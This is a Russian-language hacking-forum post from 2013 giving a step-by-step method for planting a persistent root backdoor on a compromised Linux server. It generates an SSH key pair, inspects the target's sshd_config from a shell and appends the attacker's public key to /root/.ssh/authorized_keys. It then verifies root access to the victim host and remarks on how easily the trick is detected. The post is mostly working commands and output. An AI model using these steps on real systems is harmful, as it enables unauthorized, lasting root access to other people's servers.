Показать сообщение отдельно
Старый 09.02.2013, 12:09   #22
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Закрепление в системе через ключи rsaauthentication ssh

Все знают данный метод, но тут он не описан...
Минус метода в том что он паливный когда пользователь на уязвимой системе не использует данный метод авторизации.
Зависимости:
В sshd_config
Код:
RSAAuthentication yes
Приступим:
1) Добавляем тестового пользователя, переключаемся на него:
Код:
# useradd -m xekir
# su - xekir
2) Генерируем ключи у этого пользователя:
Код:
[xekir@home ~]$ ssh-keygen -t rsa
3) Публичный ключь-строку вносим в список авторизованных ключей на уязвимом сервере:
а) сгенерированная ключь-строка лежит в
Код:
[xekir@home .ssh]$ cat /home/xekir/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home
б) список авторизованных ключей на уязвимом сервере (с шела):
Код:
$ cat /etc/ssh/sshd_config | grep AuthorizedKeysFile 2>&1
AuthorizedKeysFile	%h/.ssh/authorized_keys
Вносим (с шела):
Код:
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home' >> /root/.ssh/authorized_keys
Проверяем:
Код:
[xekir@home .ssh]$ ssh root@192.168.0.100 "id;hostname"
uid=0(root) gid=0(root) группы=0(root)
debian-webserver386

Ссылка по теме:
http://www.opennet.ru/base/sec/ssh_pubkey_auth.txt.html
b3 вне форума   Ответить с цитированием